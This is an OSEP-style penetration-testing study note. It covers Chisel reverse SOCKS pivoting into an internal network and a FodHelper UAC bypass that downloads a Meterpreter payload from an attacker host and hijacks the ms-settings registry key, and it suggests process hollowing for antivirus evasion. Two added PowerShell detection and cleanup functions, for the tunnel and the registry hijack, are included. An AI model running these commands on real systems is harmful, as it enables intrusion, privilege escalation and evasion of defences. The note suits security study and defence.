OSEP Additional Note

Summary:
1. The document describes how to use Chisel to pivot through a victim server to gain access to an internal network. It provides commands to set up a Chisel server on Kali and connect a Chisel client on the victim machine to tunnel traffic through.
2. It also outlines how to use FodHelper to bypass UAC and execute a Meterpreter payload on the victim. It provides steps to download the payload, configure the registry to trigger it, and run FodHelper to gain elevated privileges.
3. Additional payloads may need to be generated using techniques like process hollowing and encrypted shellcode to evade antivirus detection on the victim.

Uploaded by Hoàng Trong

1. Pivot with Chisel


Upload chisel/chisel.exe from Kali to c:\windows\tasks on the victim server.
Check your proxychains config on Kali at /etc/proxychains4.conf. It must define a port that proxychains will use as its proxy server.

On my Kali, I configured proxychains to use port 1080 as the proxy server listener port.
On your Kali, run the following command to start a Chisel server:

./chisel server -p 8080 --socks5 --reverse

This command instructs Chisel to use the socks5 info from /etc/proxychains and create a Chisel server whose listening port is 1085.
On the victim, run a Chisel client to connect a tunnel back to the Chisel server on our Kali:

.\chisel.exe client -v 192.168.49.109:8080 R:1080:socks

Both chisel and chisel.exe accept the same command syntax as shown above.

If successful, the Chisel server on Kali will print a Listening line like this:

→ After that, you can use proxychains to pivot any command from your Kali directly into the internal network:

proxychains4 ssh [email protected]
proxychains mongo "mongodb://internal.host:27017/internal_service"
proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py username:[email protected]
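The defender's counterpart to the pivot above is finding the dropped client and its tunnel on the victim. The following PowerShell function is an added example written for this note; it is not part of the original note and not Chisel's own tooling. It assumes a Windows host where Get-Process and Get-NetTCPConnection are available, uses the drop folder (c:\windows\tasks) and process name (chisel.exe) from the note, and treats the server port used above (8080) only as a hint, since an operator can pick any port.

```powershell
# Added example (not from the original note): look for a Chisel client dropped into
# C:\Windows\Tasks and for the outbound TCP connection that carries its reverse SOCKS tunnel.
# Assumptions: -DropFolder and -ServerPortHints are our own parameters; 8080 is the port the
# note's server listened on and is only a hint, not a rule.
function Find-ChiselTunnel {
    [CmdletBinding()]
    param(
        [string]$DropFolder = 'C:\Windows\Tasks',
        [int[]]$ServerPortHints = @(8080)
    )

    $findings = New-Object System.Collections.Generic.List[object]

    # 1. Files: C:\Windows\Tasks is writable by standard users and is rarely a legitimate
    #    home for executables, so every .exe there is worth reporting.
    Get-ChildItem -LiteralPath $DropFolder -Filter '*.exe' -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $findings.Add([pscustomobject]@{
                Kind   = 'DroppedExecutable'
                Detail = $_.FullName
                ProcId = $null
            })
        }

    # 2. Processes: match on the binary name used in the note, or on anything that was
    #    started out of the drop folder (a renamed copy still shows its path).
    $procs = Get-Process -ErrorAction SilentlyContinue |
        Where-Object { $_.ProcessName -like 'chisel*' -or ($_.Path -and $_.Path -like "$DropFolder\*") }

    foreach ($p in $procs) {
        # 3. Sockets: a reverse SOCKS client keeps one established outbound connection to
        #    the server; report the remote endpoint so the C2 host can be blocked.
        $conns = @(Get-NetTCPConnection -OwningProcess $p.Id -State Established -ErrorAction SilentlyContinue)
        foreach ($c in $conns) {
            $kind = if ($ServerPortHints -contains $c.RemotePort) { 'TunnelKnownPort' } else { 'TunnelOutbound' }
            $findings.Add([pscustomobject]@{
                Kind   = $kind
                Detail = ('{0} (PID {1}) -> {2}:{3}' -f $p.ProcessName, $p.Id, $c.RemoteAddress, $c.RemotePort)
                ProcId = $p.Id
            })
        }
        if ($conns.Count -eq 0) {
            # The client may be retrying or idle; the process alone is still a finding.
            $findings.Add([pscustomobject]@{
                Kind   = 'SuspiciousProcess'
                Detail = ('{0} (PID {1}) running from {2}' -f $p.ProcessName, $p.Id, $p.Path)
                ProcId = $p.Id
            })
        }
    }

    return $findings
}

# Usage: run in an elevated shell on the host being inspected.
Find-ChiselTunnel | Format-Table -AutoSize
```

The port hint is deliberately weak evidence: the useful signals are an executable in a user-writable system folder and a long-lived outbound connection from a process that has no business talking to the outside, which is also what a network-level rule (egress filtering from servers, or alerting on new long-lived flows) catches regardless of the port or binary name.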

2. FodHelper bypass UAC


Must run fodhelper.exe from an x64 shell. Check the shell with: [Environment]::Is64BitProcess

# Put the payload in c:\windows\tasks\Meterpreter.exe
Invoke-WebRequest -Uri http://IP_KALI/Meterpreter.exe -OutFile c:\windows\tasks\Meterpreter.exe;

# Configure the exploit
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\\windows\\tasks\\Meterpreter.exe" -Force

# Run it! FodHelper will execute our c:\windows\tasks\Meterpreter.exe
C:\Windows\System32\fodhelper.exe

Sometimes you need to build your Meterpreter.exe with Process Hollowing + encrypted shellcode for AV evasion.
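The bypass above leaves a precise artifact: a per-user ms-settings handler under HKCU with a DelegateExecute value and a command pointing at the payload. The following PowerShell function is an added example for this note, not part of the original note and not a Microsoft tool; it inspects that exact key, reports what it finds, and optionally removes the hijack. It assumes it runs as the user whose HKCU hive is being checked, and -Remediate is our own switch.

```powershell
# Added example (not from the original note): check the user's registry for the
# ms-settings handler hijack that fodhelper.exe honours, and optionally remove it.
# Assumptions: the key paths are the ones used in the note above; -Remediate is our own switch.
function Test-MsSettingsHijack {
    [CmdletBinding()]
    param(
        [string]$RootKey    = 'HKCU:\Software\Classes\ms-settings',
        [string]$CommandKey = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command',
        [switch]$Remediate
    )

    $result = [ordered]@{
        KeyPresent      = $false
        DelegateExecute = $null
        Command         = $null
        Suspicious      = $false
        Removed         = $false
    }

    if (-not (Test-Path -LiteralPath $CommandKey)) {
        # A clean profile has no per-user ms-settings handler at all.
        return [pscustomobject]$result
    }

    $result.KeyPresent = $true
    $props = Get-ItemProperty -LiteralPath $CommandKey -ErrorAction SilentlyContinue

    # DelegateExecute (even when empty) is the marker that makes fodhelper run the
    # (default) command instead of the normal handler.
    if ($null -ne $props -and $null -ne $props.PSObject.Properties['DelegateExecute']) {
        $result.DelegateExecute = [string]$props.DelegateExecute
    }
    if ($null -ne $props -and $null -ne $props.PSObject.Properties['(default)']) {
        $result.Command = [string]$props.'(default)'
    }

    # Any per-user override of this handler is abnormal; the combination of a
    # DelegateExecute value and a command is the exact shape of the bypass.
    $result.Suspicious = $true
    if ($null -ne $result.DelegateExecute -and $result.Command) {
        Write-Warning ("ms-settings handler hijack: DelegateExecute set, command = '{0}'" -f $result.Command)
    } else {
        Write-Warning "Unexpected per-user ms-settings handler present (no full hijack shape yet)"
    }

    if ($Remediate) {
        # Removing the whole per-user ms-settings key restores the default handler;
        # the dropped payload itself still has to be quarantined separately.
        Remove-Item -LiteralPath $RootKey -Recurse -Force -ErrorAction Stop
        $result.Removed = -not (Test-Path -LiteralPath $RootKey)
    }

    return [pscustomobject]$result
}

# Usage: report only
Test-MsSettingsHijack
# Usage: report and clean up
# Test-MsSettingsHijack -Remediate
```

Because the key is created at runtime and usually deleted again afterwards, a point-in-time check like this can miss a fast operator; the durable signal is a registry value-set event on HKCU\Software\Classes\ms-settings\Shell\Open\command (Sysmon Event ID 13 with a rule on that path) followed by fodhelper.exe spawning a child process that is not the Settings app.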
